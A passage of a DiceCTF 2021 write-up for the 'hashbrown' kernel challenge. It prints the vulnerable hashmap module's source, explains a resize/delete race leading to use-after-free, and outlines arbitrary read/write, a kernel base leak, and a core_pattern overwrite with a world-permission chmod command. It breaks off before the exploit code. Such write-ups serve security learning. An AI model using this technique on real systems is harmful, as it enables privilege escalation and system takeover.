mutex_unlock(&amp;operations_lock); return result; } static uint32_t get_hash_idx(uint32_t key, uint32_t size) { uint32_t hash; key ^= (key &gt;&gt; 20) ^ (key &gt;&gt; 12); hash = key ^ (key &gt;&gt; 7) ^ (key &gt;&gt; 4); return hash &amp; (size - 1); } static noinline void resize_add(uint32_t idx, hash_entry *entry, hash_entry **new_buckets) { if (!new_buckets[idx]) { new_buckets[idx] = entry; } else { entry-&gt;next = new_buckets[idx]; new_buckets[idx] = entry; } } static noinline void resize_clean_old() { int i; hash_entry *traverse, *temp; for (i = 0; i &lt; hashmap.size; i++) { if (hashmap.buckets[i]) { traverse = hashmap.buckets[i]; while (traverse) { temp = traverse; traverse = traverse-&gt;next; kfree(temp); } hashmap.buckets[i] = NULL; } } kfree(hashmap.buckets); hashmap.buckets = NULL; return; } static long resize(request_t *arg) { hash_entry **new_buckets, *temp_entry, *temp; request_t request; char *temp_data; uint32_t new_size, new_threshold, new_idx; int i, duplicate; if (copy_from_user((void *)&amp;request, (void *)arg, sizeof(request_t))) { return INVALID; } if (request.size &lt; 1 || request.size &gt; MAX_VALUE_SIZE) { return INVALID; } new_size = hashmap.size * 2; new_threshold = GET_THRESHOLD(new_size); new_buckets = kzalloc(sizeof(hash_entry *) * new_size, GFP_KERNEL); if (!new_buckets) { return INVALID; } duplicate = 0; for (i = 0; i &lt; hashmap.size; i++) { if (hashmap.buckets[i]) { for (temp_entry = hashmap.buckets[i]; temp_entry != NULL; temp_entry = temp_entry-&gt;next) { if (temp_entry-&gt;key == request.key) { duplicate = 1; } new_idx = get_hash_idx(temp_entry-&gt;key, new_size); temp = kzalloc(sizeof(hash_entry), GFP_KERNEL); if (!temp) { kfree(new_buckets); return INVALID; } temp-&gt;key = temp_entry-&gt;key; temp-&gt;size = temp_entry-&gt;size; temp-&gt;value = temp_entry-&gt;value; resize_add(new_idx, temp, new_buckets); } } } if (!duplicate) { new_idx = get_hash_idx(request.key, new_size); temp = kzalloc(sizeof(hash_entry), GFP_KERNEL); if (!temp) { kfree(new_buckets); return INVALID; } temp_data = kzalloc(request.size, GFP_KERNEL); if (!temp_data) { kfree(temp); kfree(new_buckets); return INVALID; } if (copy_from_user(temp_data, request.src, request.size)) { kfree(temp_data); kfree(temp); kfree(new_buckets); return INVALID; } temp-&gt;size = request.size; temp-&gt;value = temp_data; temp-&gt;key = request.key; temp-&gt;next = NULL; resize_add(new_idx, temp, new_buckets); hashmap.entry_count++; } resize_clean_old(); hashmap.size = new_size; hashmap.threshold = new_threshold; hashmap.buckets = new_buckets; return (duplicate) ? EXISTS : 0; } static long add_key(uint32_t idx, uint32_t key, uint32_t size, char *src) { hash_entry *temp_entry, *temp; char *temp_data; if (size &lt; 1 || size &gt; MAX_VALUE_SIZE) { return INVALID; } temp_entry = kzalloc(sizeof(hash_entry), GFP_KERNEL); temp_data = kzalloc(size, GFP_KERNEL); if (!temp_entry || !temp_data) { return INVALID; } if (copy_from_user(temp_data, src, size)) { return INVALID; } temp_entry-&gt;key = key; temp_entry-&gt;size = size; temp_entry-&gt;value = temp_data; temp_entry-&gt;next = NULL; if (!hashmap.buckets[idx]) { hashmap.buckets[idx] = temp_entry; hashmap.entry_count++; return 0; } else { for (temp = hashmap.buckets[idx]; temp-&gt;next != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { kfree(temp_data); kfree(temp_entry); return EXISTS; } } if (temp-&gt;key == key) { kfree(temp_data); kfree(temp_entry); return EXISTS; } temp-&gt;next = temp_entry; hashmap.entry_count++; return 0; } } static long delete_key(uint32_t idx, uint32_t key) { hash_entry *temp, *prev; if (!hashmap.buckets[idx]) { return NOT_EXISTS; } if (hashmap.buckets[idx]-&gt;key == key) { temp = hashmap.buckets[idx]-&gt;next; if (hashmap.buckets[idx]-&gt;value) { kfree(hashmap.buckets[idx]-&gt;value); } kfree(hashmap.buckets[idx]); hashmap.buckets[idx] = temp; hashmap.entry_count--; return 0; } temp = hashmap.buckets[idx]; while (temp != NULL &amp;&amp; temp-&gt;key != key) { prev = temp; temp = temp-&gt;next; } if (temp == NULL) { return NOT_EXISTS; } prev-&gt;next = temp-&gt;next; if (temp-&gt;value) { kfree(temp-&gt;value); } kfree(temp); hashmap.entry_count--; return 0; } static long update_value(uint32_t idx, uint32_t key, uint32_t size, char *src) { hash_entry *temp; char *temp_data; if (size &lt; 1 || size &gt; MAX_VALUE_SIZE) { return INVALID; } if (!hashmap.buckets[idx]) { return NOT_EXISTS; } for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { if (temp-&gt;size != size) { if (temp-&gt;value) { kfree(temp-&gt;value); } temp-&gt;value = NULL; temp-&gt;size = 0; temp_data = kzalloc(size, GFP_KERNEL); if (!temp_data || copy_from_user(temp_data, src, size)) { return INVALID; } temp-&gt;size = size; temp-&gt;value = temp_data; } else { if (copy_from_user(temp-&gt;value, src, size)) { return INVALID; } } return 0; } } return NOT_EXISTS; } static long delete_value(uint32_t idx, uint32_t key) { hash_entry *temp; if (!hashmap.buckets[idx]) { return NOT_EXISTS; } for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { if (!temp-&gt;value || !temp-&gt;size) { return NOT_EXISTS; } kfree(temp-&gt;value); temp-&gt;value = NULL; temp-&gt;size = 0; return 0; } } return NOT_EXISTS; } static long get_value(uint32_t idx, uint32_t key, uint32_t size, char *dest) { hash_entry *temp; if (!hashmap.buckets[idx]) { return NOT_EXISTS; } for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { if (!temp-&gt;value || !temp-&gt;size) { return NOT_EXISTS; } if (size &gt; temp-&gt;size) { return INVALID; } if (copy_to_user(dest, temp-&gt;value, size)) { return INVALID; } return 0; } } return NOT_EXISTS; } #pragma GCC pop_options static int __init init_hashbrown(void) { major = register_chrdev(0, DEVICE_NAME, &amp;hashbrown_fops); if (major &lt; 0) { return -1; } hashbrown_class = class_create(THIS_MODULE, CLASS_NAME); if (IS_ERR(hashbrown_class)) { unregister_chrdev(major, DEVICE_NAME); return -1; } hashbrown_device = device_create(hashbrown_class, 0, MKDEV(major, 0), 0, DEVICE_NAME); if (IS_ERR(hashbrown_device)) { class_destroy(hashbrown_class); unregister_chrdev(major, DEVICE_NAME); return -1; } mutex_init(&amp;operations_lock); mutex_init(&amp;resize_lock); hashmap.size = SIZE_ARR_START; hashmap.entry_count = 0; hashmap.threshold = GET_THRESHOLD(hashmap.size); hashmap.buckets = kzalloc(sizeof(hash_entry *) * hashmap.size, GFP_KERNEL); printk(KERN_INFO &#34;HashBrown Loaded! Who doesn&#39;t love Hashbrowns!\n&#34;); return 0; } static void __exit exit_hashbrown(void) { device_destroy(hashbrown_class, MKDEV(major, 0)); class_unregister(hashbrown_class); class_destroy(hashbrown_class); unregister_chrdev(major, DEVICE_NAME); mutex_destroy(&amp;operations_lock); mutex_destroy(&amp;resize_lock); printk(KERN_INFO &#34;HashBrown Unloaded\n&#34;); } module_init(init_hashbrown); module_exit(exit_hashbrown);</code></pre></div> <p>This module allow us to add, delete and update key and value to hashmap.</p> <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v5.11-rc3/source"><code>5.11.0-rc3</code></a> <ul> <li>CONFIG_SLAB_FREELIST_RANDOM=y</li> <li>CONFIG_SLAB=y</li> <li>CONFIG_FG_KASLR=y</li> </ul> </li> <li>unprivileged_userfaultfd: 1</li> <li>unprivileged_bpf_disabled: 0</li> </ul> <h3 id="module">Module</h3> <div class="collapsable-code"> <input id="381792654" type="checkbox" checked /> <label for="381792654"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">DiceCTF2021-hashbrown-module.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;linux/device.h&gt; #include &lt;linux/fs.h&gt; #include &lt;linux/kernel.h&gt; #include &lt;linux/module.h&gt; #include &lt;linux/mutex.h&gt; #include &lt;linux/slab.h&gt; #include &lt;linux/uaccess.h&gt; #define DEVICE_NAME &#34;hashbrown&#34; #define CLASS_NAME &#34;hashbrown&#34; MODULE_AUTHOR(&#34;FizzBuzz101&#34;); MODULE_DESCRIPTION(&#34;Here&#39;s a hashbrown for everyone!&#34;); MODULE_LICENSE(&#34;GPL&#34;); #define ADD_KEY 0x1337 #define DELETE_KEY 0x1338 #define UPDATE_VALUE 0x1339 #define DELETE_VALUE 0x133a #define GET_VALUE 0x133b #define SIZE_ARR_START 0x10 #define SIZE_ARR_MAX 0x200 #define MAX_ENTRIES 0x400 #define MAX_VALUE_SIZE 0xb0 #define GET_THRESHOLD(size) size - (size &gt;&gt; 2) #define INVALID 1 #define EXISTS 2 #define NOT_EXISTS 3 #define MAXED 4 static DEFINE_MUTEX(operations_lock); static DEFINE_MUTEX(resize_lock); static long hashmap_ioctl(struct file *file, unsigned int cmd, unsigned long arg); static int major; static struct class *hashbrown_class = NULL; static struct device *hashbrown_device = NULL; static struct file_operations hashbrown_fops = {.unlocked_ioctl = hashmap_ioctl}; typedef struct { uint32_t key; uint32_t size; char *src; char *dest; } request_t; struct hash_entry { uint32_t key; uint32_t size; char *value; struct hash_entry *next; }; typedef struct hash_entry hash_entry; typedef struct { uint32_t size; uint32_t threshold; uint32_t entry_count; hash_entry **buckets; } hashmap_t; hashmap_t hashmap; static noinline uint32_t get_hash_idx(uint32_t key, uint32_t size); static noinline long resize(request_t *arg); static noinline void resize_add(uint32_t idx, hash_entry *entry, hash_entry **new_buckets); static noinline void resize_clean_old(void); static noinline long add_key(uint32_t idx, uint32_t key, uint32_t size, char *src); static noinline long delete_key(uint32_t idx, uint32_t key); static noinline long update_value(uint32_t idx, uint32_t key, uint32_t size, char *src); static noinline long delete_value(uint32_t idx, uint32_t key); static noinline long get_value(uint32_t idx, uint32_t key, uint32_t size, char *dest); #pragma GCC push_options #pragma GCC optimize(&#34;O1&#34;) static long hashmap_ioctl(struct file *file, unsigned int cmd, unsigned long arg) { long result; request_t request; uint32_t idx; if (cmd == ADD_KEY) { if (hashmap.entry_count == hashmap.threshold &amp;&amp; hashmap.size &lt; SIZE_ARR_MAX) { mutex_lock(&amp;resize_lock); result = resize((request_t *)arg); mutex_unlock(&amp;resize_lock); return result; } } mutex_lock(&amp;operations_lock); if (copy_from_user((void *)&amp;request, (void *)arg, sizeof(request_t))) { result = INVALID; } else if (cmd == ADD_KEY &amp;&amp; hashmap.entry_count == MAX_ENTRIES) { result = MAXED; } else { idx = get_hash_idx(request.key, hashmap.size); switch (cmd) { case ADD_KEY: result = add_key(idx, request.key, request.size, request.src); break; case DELETE_KEY: result = delete_key(idx, request.key); break; case UPDATE_VALUE: result = update_value(idx, request.key, request.size, request.src); break; case DELETE_VALUE: result = delete_value(idx, request.key); break; case GET_VALUE: result = get_value(idx, request.key, request.size, request.dest); break; default: result = INVALID; break; } } mutex_unlock(&amp;operations_lock); return result; } static uint32_t get_hash_idx(uint32_t key, uint32_t size) { uint32_t hash; key ^= (key &gt;&gt; 20) ^ (key &gt;&gt; 12); hash = key ^ (key &gt;&gt; 7) ^ (key &gt;&gt; 4); return hash &amp; (size - 1); } static noinline void resize_add(uint32_t idx, hash_entry *entry, hash_entry **new_buckets) { if (!new_buckets[idx]) { new_buckets[idx] = entry; } else { entry-&gt;next = new_buckets[idx]; new_buckets[idx] = entry; } } static noinline void resize_clean_old() { int i; hash_entry *traverse, *temp; for (i = 0; i &lt; hashmap.size; i++) { if (hashmap.buckets[i]) { traverse = hashmap.buckets[i]; while (traverse) { temp = traverse; traverse = traverse-&gt;next; kfree(temp); } hashmap.buckets[i] = NULL; } } kfree(hashmap.buckets); hashmap.buckets = NULL; return; } static long resize(request_t *arg) { hash_entry **new_buckets, *temp_entry, *temp; request_t request; char *temp_data; uint32_t new_size, new_threshold, new_idx; int i, duplicate; if (copy_from_user((void *)&amp;request, (void *)arg, sizeof(request_t))) { return INVALID; } if (request.size &lt; 1 || request.size &gt; MAX_VALUE_SIZE) { return INVALID; } new_size = hashmap.size * 2; new_threshold = GET_THRESHOLD(new_size); new_buckets = kzalloc(sizeof(hash_entry *) * new_size, GFP_KERNEL); if (!new_buckets) { return INVALID; } duplicate = 0; for (i = 0; i &lt; hashmap.size; i++) { if (hashmap.buckets[i]) { for (temp_entry = hashmap.buckets[i]; temp_entry != NULL; temp_entry = temp_entry-&gt;next) { if (temp_entry-&gt;key == request.key) { duplicate = 1; } new_idx = get_hash_idx(temp_entry-&gt;key, new_size); temp = kzalloc(sizeof(hash_entry), GFP_KERNEL); if (!temp) { kfree(new_buckets); return INVALID; } temp-&gt;key = temp_entry-&gt;key; temp-&gt;size = temp_entry-&gt;size; temp-&gt;value = temp_entry-&gt;value; resize_add(new_idx, temp, new_buckets); } } } if (!duplicate) { new_idx = get_hash_idx(request.key, new_size); temp = kzalloc(sizeof(hash_entry), GFP_KERNEL); if (!temp) { kfree(new_buckets); return INVALID; } temp_data = kzalloc(request.size, GFP_KERNEL); if (!temp_data) { kfree(temp); kfree(new_buckets); return INVALID; } if (copy_from_user(temp_data, request.src, request.size)) { kfree(temp_data); kfree(temp); kfree(new_buckets); return INVALID; } temp-&gt;size = request.size; temp-&gt;value = temp_data; temp-&gt;key = request.key; temp-&gt;next = NULL; resize_add(new_idx, temp, new_buckets); hashmap.entry_count++; } resize_clean_old(); hashmap.size = new_size; hashmap.threshold = new_threshold; hashmap.buckets = new_buckets; return (duplicate) ? EXISTS : 0; } static long add_key(uint32_t idx, uint32_t key, uint32_t size, char *src) { hash_entry *temp_entry, *temp; char *temp_data; if (size &lt; 1 || size &gt; MAX_VALUE_SIZE) { return INVALID; } temp_entry = kzalloc(sizeof(hash_entry), GFP_KERNEL); temp_data = kzalloc(size, GFP_KERNEL); if (!temp_entry || !temp_data) { return INVALID; } if (copy_from_user(temp_data, src, size)) { return INVALID; } temp_entry-&gt;key = key; temp_entry-&gt;size = size; temp_entry-&gt;value = temp_data; temp_entry-&gt;next = NULL; if (!hashmap.buckets[idx]) { hashmap.buckets[idx] = temp_entry; hashmap.entry_count++; return 0; } else { for (temp = hashmap.buckets[idx]; temp-&gt;next != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { kfree(temp_data); kfree(temp_entry); return EXISTS; } } if (temp-&gt;key == key) { kfree(temp_data); kfree(temp_entry); return EXISTS; } temp-&gt;next = temp_entry; hashmap.entry_count++; return 0; } } static long delete_key(uint32_t idx, uint32_t key) { hash_entry *temp, *prev; if (!hashmap.buckets[idx]) { return NOT_EXISTS; } if (hashmap.buckets[idx]-&gt;key == key) { temp = hashmap.buckets[idx]-&gt;next; if (hashmap.buckets[idx]-&gt;value) { kfree(hashmap.buckets[idx]-&gt;value); } kfree(hashmap.buckets[idx]); hashmap.buckets[idx] = temp; hashmap.entry_count--; return 0; } temp = hashmap.buckets[idx]; while (temp != NULL &amp;&amp; temp-&gt;key != key) { prev = temp; temp = temp-&gt;next; } if (temp == NULL) { return NOT_EXISTS; } prev-&gt;next = temp-&gt;next; if (temp-&gt;value) { kfree(temp-&gt;value); } kfree(temp); hashmap.entry_count--; return 0; } static long update_value(uint32_t idx, uint32_t key, uint32_t size, char *src) { hash_entry *temp; char *temp_data; if (size &lt; 1 || size &gt; MAX_VALUE_SIZE) { return INVALID; } if (!hashmap.buckets[idx]) { return NOT_EXISTS; } for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { if (temp-&gt;size != size) { if (temp-&gt;value) { kfree(temp-&gt;value); } temp-&gt;value = NULL; temp-&gt;size = 0; temp_data = kzalloc(size, GFP_KERNEL); if (!temp_data || copy_from_user(temp_data, src, size)) { return INVALID; } temp-&gt;size = size; temp-&gt;value = temp_data; } else { if (copy_from_user(temp-&gt;value, src, size)) { return INVALID; } } return 0; } } return NOT_EXISTS; } static long delete_value(uint32_t idx, uint32_t key) { hash_entry *temp; if (!hashmap.buckets[idx]) { return NOT_EXISTS; } for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { if (!temp-&gt;value || !temp-&gt;size) { return NOT_EXISTS; } kfree(temp-&gt;value); temp-&gt;value = NULL; temp-&gt;size = 0; return 0; } } return NOT_EXISTS; } static long get_value(uint32_t idx, uint32_t key, uint32_t size, char *dest) { hash_entry *temp; if (!hashmap.buckets[idx]) { return NOT_EXISTS; } for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { if (!temp-&gt;value || !temp-&gt;size) { return NOT_EXISTS; } if (size &gt; temp-&gt;size) { return INVALID; } if (copy_to_user(dest, temp-&gt;value, size)) { return INVALID; } return 0; } } return NOT_EXISTS; } #pragma GCC pop_options static int __init init_hashbrown(void) { major = register_chrdev(0, DEVICE_NAME, &amp;hashbrown_fops); if (major &lt; 0) { return -1; } hashbrown_class = class_create(THIS_MODULE, CLASS_NAME); if (IS_ERR(hashbrown_class)) { unregister_chrdev(major, DEVICE_NAME); return -1; } hashbrown_device = device_create(hashbrown_class, 0, MKDEV(major, 0), 0, DEVICE_NAME); if (IS_ERR(hashbrown_device)) { class_destroy(hashbrown_class); unregister_chrdev(major, DEVICE_NAME); return -1; } mutex_init(&amp;operations_lock); mutex_init(&amp;resize_lock); hashmap.size = SIZE_ARR_START; hashmap.entry_count = 0; hashmap.threshold = GET_THRESHOLD(hashmap.size); hashmap.buckets = kzalloc(sizeof(hash_entry *) * hashmap.size, GFP_KERNEL); printk(KERN_INFO &#34;HashBrown Loaded! Who doesn&#39;t love Hashbrowns!\n&#34;); return 0; } static void __exit exit_hashbrown(void) { device_destroy(hashbrown_class, MKDEV(major, 0)); class_unregister(hashbrown_class); class_destroy(hashbrown_class); unregister_chrdev(major, DEVICE_NAME); mutex_destroy(&amp;operations_lock); mutex_destroy(&amp;resize_lock); printk(KERN_INFO &#34;HashBrown Unloaded\n&#34;); } module_init(init_hashbrown); module_exit(exit_hashbrown);</code></pre></div> <p>This module allow us to add, delete and update key and value to hashmap.</p> <h3 id="vulnerability">Vulnerability</h3> <p>The vulnerability is easy, a race condition can be occurs in <code>hashmap_ioctl</code> function:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">static</span> <span style="color:#66d9ef">long</span> <span style="color:#a6e22e">hashmap_ioctl</span>(<span style="color:#66d9ef">struct</span> file <span style="color:#f92672">*</span>file, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> cmd, </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> arg) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">long</span> result; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">request_t</span> request; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> idx; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> ADD_KEY) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (hashmap.entry_count <span style="color:#f92672">==</span> hashmap.threshold <span style="color:#f92672">&amp;&amp;</span> </span></span><span style="display:flex;"><span> hashmap.size <span style="color:#f92672">&lt;</span> SIZE_ARR_MAX) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_lock</span>(<span style="color:#f92672">&amp;</span>resize_lock); </span></span><span style="display:flex;"><span> result <span style="color:#f92672">=</span> <span style="color:#a6e22e">resize</span>((<span style="color:#66d9ef">request_t</span> <span style="color:#f92672">*</span>)arg); </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>resize_lock); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> result; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_lock</span>(<span style="color:#f92672">&amp;</span>operations_lock); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">copy_from_user</span>((<span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>)<span style="color:#f92672">&amp;</span>request, (<span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>)arg, <span style="color:#66d9ef">sizeof</span>(<span style="color:#66d9ef">request_t</span>))) { </span></span><span style="display:flex;"><span> result <span style="color:#f92672">=</span> INVALID; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> ADD_KEY <span style="color:#f92672">&amp;&amp;</span> hashmap.entry_count <span style="color:#f92672">==</span> MAX_ENTRIES) { </span></span><span style="display:flex;"><span> result <span style="color:#f92672">=</span> MAXED; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> { </span></span><span style="display:flex;"><span> idx <span style="color:#f92672">=</span> <span style="color:#a6e22e">get_hash_idx</span>(request.key, hashmap.size); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">switch</span> (cmd) { </span></span><span style="display:flex;"><span> <span style="color:#75715e">// ... </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>operations_lock); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> result; </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><p>As we can see, we can trigger <code>resize</code> function and other modification functions. And in <code>resize</code> function, there is a entry-copy mechanism which allocate new heap chunk and copy old entry&rsquo;s data to new one. After copying, delete old hashmap&rsquo;s bucket using <code>resize_clean_old</code> and set hashmap&rsquo;s bucket to new one:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">static</span> <span style="color:#66d9ef">long</span> <span style="color:#a6e22e">resize</span>(<span style="color:#66d9ef">request_t</span> <span style="color:#f92672">*</span>arg) { </span></span><span style="display:flex;"><span> hash_entry <span style="color:#f92672">**</span>new_buckets, <span style="color:#f92672">*</span>temp_entry, <span style="color:#f92672">*</span>temp; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">request_t</span> request; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>temp_data; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> new_size, new_threshold, new_idx; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">int</span> i, duplicate; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e">// ... </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> </span></span><span style="display:flex;"><span> duplicate <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">for</span> (i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> hashmap.size; i<span style="color:#f92672">++</span>) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (hashmap.buckets[i]) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">for</span> (temp_entry <span style="color:#f92672">=</span> hashmap.buckets[i]; temp_entry <span style="color:#f92672">!=</span> NULL; </span></span><span style="display:flex;"><span> temp_entry <span style="color:#f92672">=</span> temp_entry<span style="color:#f92672">-&gt;</span>next) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (temp_entry<span style="color:#f92672">-&gt;</span>key <span style="color:#f92672">==</span> request.key) { </span></span><span style="display:flex;"><span> duplicate <span style="color:#f92672">=</span> <span style="color:#ae81ff">1</span>; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> new_idx <span style="color:#f92672">=</span> <span style="color:#a6e22e">get_hash_idx</span>(temp_entry<span style="color:#f92672">-&gt;</span>key, new_size); </span></span><span style="display:flex;"><span> temp <span style="color:#f92672">=</span> <span style="color:#a6e22e">kzalloc</span>(<span style="color:#66d9ef">sizeof</span>(hash_entry), GFP_KERNEL); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>temp) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(new_buckets); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> INVALID; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> temp<span style="color:#f92672">-&gt;</span>key <span style="color:#f92672">=</span> temp_entry<span style="color:#f92672">-&gt;</span>key; </span></span><span style="display:flex;"><span> temp<span style="color:#f92672">-&gt;</span>size <span style="color:#f92672">=</span> temp_entry<span style="color:#f92672">-&gt;</span>size; </span></span><span style="display:flex;"><span> temp<span style="color:#f92672">-&gt;</span>value <span style="color:#f92672">=</span> temp_entry<span style="color:#f92672">-&gt;</span>value; </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">resize_add</span>(new_idx, temp, new_buckets); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>duplicate) { </span></span><span style="display:flex;"><span> new_idx <span style="color:#f92672">=</span> <span style="color:#a6e22e">get_hash_idx</span>(request.key, new_size); </span></span><span style="display:flex;"><span> temp <span style="color:#f92672">=</span> <span style="color:#a6e22e">kzalloc</span>(<span style="color:#66d9ef">sizeof</span>(hash_entry), GFP_KERNEL); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>temp) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(new_buckets); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> INVALID; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> temp_data <span style="color:#f92672">=</span> <span style="color:#a6e22e">kzalloc</span>(request.size, GFP_KERNEL); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>temp_data) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(temp); </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(new_buckets); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> INVALID; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">copy_from_user</span>(temp_data, request.src, request.size)) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(temp_data); </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(temp); </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(new_buckets); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> INVALID; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> temp<span style="color:#f92672">-&gt;</span>size <span style="color:#f92672">=</span> request.size; </span></span><span style="display:flex;"><span> temp<span style="color:#f92672">-&gt;</span>value <span style="color:#f92672">=</span> temp_data; </span></span><span style="display:flex;"><span> temp<span style="color:#f92672">-&gt;</span>key <span style="color:#f92672">=</span> request.key; </span></span><span style="display:flex;"><span> temp<span style="color:#f92672">-&gt;</span>next <span style="color:#f92672">=</span> NULL; </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">resize_add</span>(new_idx, temp, new_buckets); </span></span><span style="display:flex;"><span> hashmap.entry_count<span style="color:#f92672">++</span>; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">resize_clean_old</span>(); </span></span><span style="display:flex;"><span> hashmap.size <span style="color:#f92672">=</span> new_size; </span></span><span style="display:flex;"><span> hashmap.threshold <span style="color:#f92672">=</span> new_threshold; </span></span><span style="display:flex;"><span> hashmap.buckets <span style="color:#f92672">=</span> new_buckets; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> (duplicate) <span style="color:#f92672">?</span> EXISTS : <span style="color:#ae81ff">0</span>; </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><h2 id="exploit">Exploit</h2> <h3 id="make-uaf-and-get-controlled-entry">Make UAF and get controlled entry</h3> <p>So, if we delete the value after copying and before <code>resize_clean_old</code>, there will be freed value in new bucket. Since size of <code>hash_entry</code> is 0x20, we can get controll to entry with freed value in new bucket (see <code>construct_corrupted_entry</code>).</p> <h3 id="aaraaw">AAR/AAW</h3> <p>In <code>hash_entry</code>, <code>size</code> and <code>value</code> member exist. So we can make AAR and AAW primitives using them (see <code>aar</code> and <code>aaw</code>).</p> <h3 id="find-core_pattern-and-overwrite-it">Find core_pattern and overwrite it</h3> <p>Although we can read and write at arbitrary address, there is a limit to do reading because of <a href="https://elixir.bootlin.com/linux/v5.11-rc3/source/mm/usercopy.c#L256"><code>__check_object_size</code></a>. But, I can leak some address in kernel area (see <code>find_kernel_address</code>). And using it, I can find kernel base (see <code>find_core_pattern_address</code> and the few lines after calling it).</p> <p>Then since we can read and write at arbitrary address and we know the <code>core_pattern</code> address, overwrite <code>core_pattern</code> with &ldquo;|/bin/chmod 6777 -R /&rdquo;.</p> <h3 id="exploit-code">Exploit code</h3> <div class="collapsable-code"> <input id="549712386" type="checkbox" checked /> <label for="549712386"> <span 